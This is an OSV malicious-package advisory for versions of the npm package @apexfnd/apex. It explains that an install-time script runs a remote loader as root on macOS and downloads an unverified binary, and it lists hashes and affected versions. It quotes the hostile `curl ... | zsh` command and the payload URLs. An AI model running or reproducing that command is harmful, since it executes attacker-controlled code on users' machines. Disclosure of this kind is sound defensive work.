{"id":"MAL-2026-11121","summary":"Malicious code in @apexfnd/apex (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (8716e3bd410648407039879f991abe8adbde650ab008bac4e41165e7b52c79b1)\nThe npm package @apexfnd/apex ships a postinstall script (install.cjs) that performs two install-time remote-code-execution actions. On macOS it writes an AppleScript to /tmp and invokes osascript to run `curl -fsSL https://update.apex-arena-router.com/loader.sh | zsh` with administrator privileges, prompting the user for their password and executing the returned shell script as root. On all platforms it also unconditionally downloads a platform-specific binary from `https://github.com/Apex-Foundation/copilot/releases/download/v1.0.0/apex-\u003ctarget\u003e`, writes it to the package's bin path, and chmods it 0755, without any hash or signature verification. The package's declared publisher metadata (homepage omp.sh, repository can1357/oh-my-pi) does not match either destination (update.apex-arena-router.com, github.com/Apex-Foundation/copilot); the fetched content is attacker-controlled bytes executed on the installer's machine at install time, with root privileges on macOS.\n","modified":"2026-08-05T13:35:07.129513139Z","published":"2026-07-28T13:35:21Z","database_specific":{"malicious-packages-origins":[{"source":"amazon-inspector","versions":["1.0.0"],"id":"IN-MAL-2026-010912","import_time":"2026-07-28T14:19:58.693637794Z","modified_time":"2026-07-28T13:35:21Z","sha256":"8716e3bd410648407039879f991abe8adbde650ab008bac4e41165e7b52c79b1"},{"sha256":"a36d1bb6b7f3f846668a106c514c55789cd9b94500ad04d579dc5fa2621c438c","source":"amazon-inspector","versions":["1.0.1"],"id":"IN-MAL-2026-010914","import_time":"2026-07-28T14:19:58.858747377Z","modified_time":"2026-07-28T13:35:39Z"},{"versions":["1.0.3"],"id":"IN-MAL-2026-014885","import_time":"2026-08-05T13:08:52.980377294Z","modified_time":"2026-08-05T13:06:33Z","sha256":"3db51d0dadd3b16a7fafd6059f176c5804cf716b771c0d3b3d1073e0653ec41b","source":"amazon-inspector"},{"sha256":"d0e3f3f7e061602f0908c3e70b635296a021e4ae625ca45b01177f6a49698e0e","source":"amazon-inspector","versions":["1.0.4"],"id":"IN-MAL-2026-014887","import_time":"2026-08-05T13:08:53.110389846Z","modified_time":"2026-08-05T13:06:50Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/@apexfnd/apex/v/1.0.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@apexfnd/apex/v/1.0.1"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@apexfnd/apex/v/1.0.3"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@apexfnd/apex/v/1.0.4"}],"affected":[{"package":{"name":"@apexfnd/apex","ecosystem":"npm","purl":"pkg:npm/%40apexfnd/apex"},"versions":["1.0.0","1.0.1","1.0.3","1.0.4"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@apexfnd/apex/MAL-2026-11121.json","cwes":[{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."},{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."},{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"},{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."}],"indicators":{"evidence_files":[{"sha256":"52a9d24f9824a952f9d5a9cb9d9797b7cf66defeb388eff679af820ab2ccff8f","tlsh":"ff7145ca07f4a5680b9295e6819b2067f53390037505d888ba6cc748ff879b4cb379fe","path":"install.cjs"}],"package_integrity":[{"filename":"apex-1.0.0.tgz","hashes":{"sha512_sri":"sha512-2t5H0OpVwQezPYb/CrOrZ6uJqhqTdpPUI0Wswc2GY7AEVKUHAADSEYia+KWDFHTczyLZ0KkLr7YU7m3TvNnTQg==","sha1":"dfba75e157ccf4fa2dda13d19082f0814deeb830"}}]}}}],"schema_version":"1.8.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}